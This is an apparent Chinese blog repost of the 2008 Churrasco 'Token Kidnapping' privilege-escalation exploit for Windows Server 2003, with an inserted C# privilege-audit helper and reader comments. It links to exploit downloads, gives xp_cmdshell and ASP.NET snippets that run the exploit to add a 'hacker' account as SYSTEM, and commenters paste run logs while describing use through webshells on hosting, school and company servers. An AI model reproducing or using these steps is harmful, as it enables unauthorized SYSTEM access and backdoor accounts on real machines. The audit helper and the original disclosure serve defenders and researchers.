MS Windows 2003 Token Kidnapping Local Exploit PoC

鬼仔: Very handy for privilege escalation, goes straight to SYSTEM. A test screenshot from TR's place is attached at the end of the post.
Compiled build: http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009)

From: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.

Basically, if you can run code under any service in Win2k3 then you can own Windows, because Windows
service accounts can impersonate. Other processes (not services) that can impersonate are the IIS 6 worker processes,
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services, I would recommend not allowing users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'

-Exploiting IIS 6 with ASP .NET :

System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments = " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
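Both the SQL Server and the ASP .NET case above work only because the calling identity holds the impersonate privilege the post describes. The following C# audit helper is an added example, not code from the original post or the Churrasco PoC: it is my own P/Invoke wrapper over the Win32 token APIs and reports whether the identity running it (a service account or the IIS 6 worker process, say) carries SeImpersonatePrivilege, so an administrator can see which identities are exposed to this attack.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Text;
// Added audit helper (not from the original post or the Churrasco PoC): reports whether the
// current process token carries SeImpersonatePrivilege, which service accounts and the IIS 6 worker process hold.
static class ImpersonateAudit
{
    const uint TOKEN_QUERY = 0x0008;
    const int TokenPrivileges = 3;              // TOKEN_INFORMATION_CLASS.TokenPrivileges
    [StructLayout(LayoutKind.Sequential)]
    struct LUID { public uint LowPart; public int HighPart; }
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr hProcess, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool GetTokenInformation(IntPtr hToken, int cls, IntPtr info, uint len, out uint need);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeName(string sys, ref LUID luid, StringBuilder name, ref uint cch);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] static extern bool CloseHandle(IntPtr h);
    // Names of every privilege present in the process token, whether enabled or not.
    public static string[] CurrentPrivileges()
    {
        IntPtr token; uint len;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, out token))
            throw new Win32Exception();
        GetTokenInformation(token, TokenPrivileges, IntPtr.Zero, 0, out len);  // size query
        IntPtr buf = Marshal.AllocHGlobal((int)len);
        try
        {
            if (!GetTokenInformation(token, TokenPrivileges, buf, len, out len))
                throw new Win32Exception();
            int count = Marshal.ReadInt32(buf);     // TOKEN_PRIVILEGES.PrivilegeCount
            string[] names = new string[count];
            for (int i = 0; i < count; i++)
            {   // Privileges[] starts at offset 4; each LUID_AND_ATTRIBUTES is 12 bytes
                LUID luid = (LUID)Marshal.PtrToStructure(new IntPtr(buf.ToInt64() + 4 + i * 12), typeof(LUID));
                StringBuilder sb = new StringBuilder(64); uint cch = 64;
                names[i] = LookupPrivilegeName(null, ref luid, sb, ref cch) ? sb.ToString() : "?";
            }
            return names;
        }
        finally { Marshal.FreeHGlobal(buf); CloseHandle(token); }
    }
    public static bool CanImpersonate()
    { return Array.IndexOf(CurrentPrivileges(), "SeImpersonatePrivilege") >= 0; }
    static void Main()
    { Console.WriteLine(Environment.UserName + " holds SeImpersonatePrivilege: " + CanImpersonate()); }
}
```

Compile it as a console application and run it under the account in question, or call ImpersonateAudit.CanImpersonate() from an ASPX page to check the worker-process identity itself.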

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]

Screenshot here:

InsomniaShell


  • 猪猪

    What I understand least is your blog ~ so deep ~ but then your skills must be just as deep ~ worth learning from ~~~ haha……

  • vecoe

    Looks good

  • 人鱼姬

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 692
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 696
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 700
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 708
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x1f38
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x1f30
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • RealOne

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 788
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 792
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 800
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 808
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf34
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found Administrator Token
    /churrasco/–>Found Administrator Token
    /churrasco/–>Found NETWORK SERVICE Token
    /churrasco/–>Found LOCAL SERVICE Token
    /churrasco/–>Found SYSTEM token 0xf2c
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Done, command should have ran as SYSTEM!
    命令成功完成。

    The poster above has an RP (luck) problem!!!

  • 大鱼

    Tested successfully under guest; ad space for sale, la la

  • 人鱼姬

    Switched to another box
    Still fails

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 816
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 220
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 676
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 820
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 824
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 832
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x1f38
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x1f30
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • zhou2222

    Tried it on win2003 SP1 and SP2; both created the user successfully

  • x

    Newbie question: what is the principle behind this?

  • 人鱼姬

    Third failure

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 796
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 800
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 812
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 816
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x760
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x758
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • 人鱼姬

    A question for everyone:
    what ASP shell are you using?
    I'm using 海洋; that shouldn't affect this, right?

  • 小C

    The poster above has a serious luck (RP) problem.

  • 66

    Why do I get no response at all when I test it?

  • kof2008

    Tested on more than 10 shells last night; on IDC (hosting provider) servers the success rate was 0. Schools and companies had a somewhat higher success rate
    -.-#

  • love_unix

    Tried two machines, no response from either!!! Frustrated.....

  • jjjyyy

    That compiled version doesn't work
    [img]http://www.jydown.cn/up/2003.jpg[/img]

  • ABC

    Success rate over 80%. The other 20% was because the webshell hung after I had used it N times....

  • join

    This exploit still depends on luck (RP)! I tried 3 and 2 succeeded!

  • TheLostMind

    It seems that running it here gives an error saying the program entry point could not be found……
